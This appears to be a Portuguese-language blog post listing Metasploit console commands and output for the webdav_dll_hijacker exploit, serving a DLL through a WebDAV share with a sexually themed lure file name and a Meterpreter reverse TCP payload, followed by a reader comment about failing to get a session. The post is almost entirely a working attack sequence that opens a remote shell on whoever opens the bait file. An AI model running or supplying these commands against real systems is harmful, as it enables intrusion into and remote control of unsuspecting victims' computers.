COMANDOS:
root@bot:~# msfconsole -q
msf > use exploit/windows/browser/webdav_dll_hijacker
msf exploit(webdav_dll_hijacker) > set EXTENSIONS torrent
EXTENSIONS => torrent
msf exploit(webdav_dll_hijacker) > set SRVHOST your_ip
SRVHOST => 192.168.12.198
msf exploit(webdav_dll_hijacker) > set SHARENAME download
SHARENAME => download
msf exploit(webdav_dll_hijacker) > set BASENAME gostosa_nua
BASENAME => gostosa_nua
msf exploit(webdav_dll_hijacker) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(webdav_dll_hijacker) > set LHOST your_ip
LHOST => 192.168.12.198
msf exploit(webdav_dll_hijacker) > set LPORT 4444
LPORT => 4444
msf exploit(webdav_dll_hijacker) > exploit
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.12.198:4444
[*] Exploit links are now available at \\192.168.12.198\download\
[*] Using URL: http://192.168.12.198:80/
[*] Server started.
++
https://www.rapid7.com/db/modules/exploit/windows/browser/webdav_dll_hijacker
Video:
hi, hello.
ResponderExcluirI need help. I do the same, but doesnt work.
I have running a virtual machine in windows 10 and have an bridged ip
ifconfig results : xxx.xxx.xxx.80
Windows ip: xxx.xxx.xxx.81
All good at time exploit but cant have the session
sessions -i ( not have sessions active)
i disable firewall and windows defender because try to block the .dll
adding this a rules, but nothing happend.
can you helpme?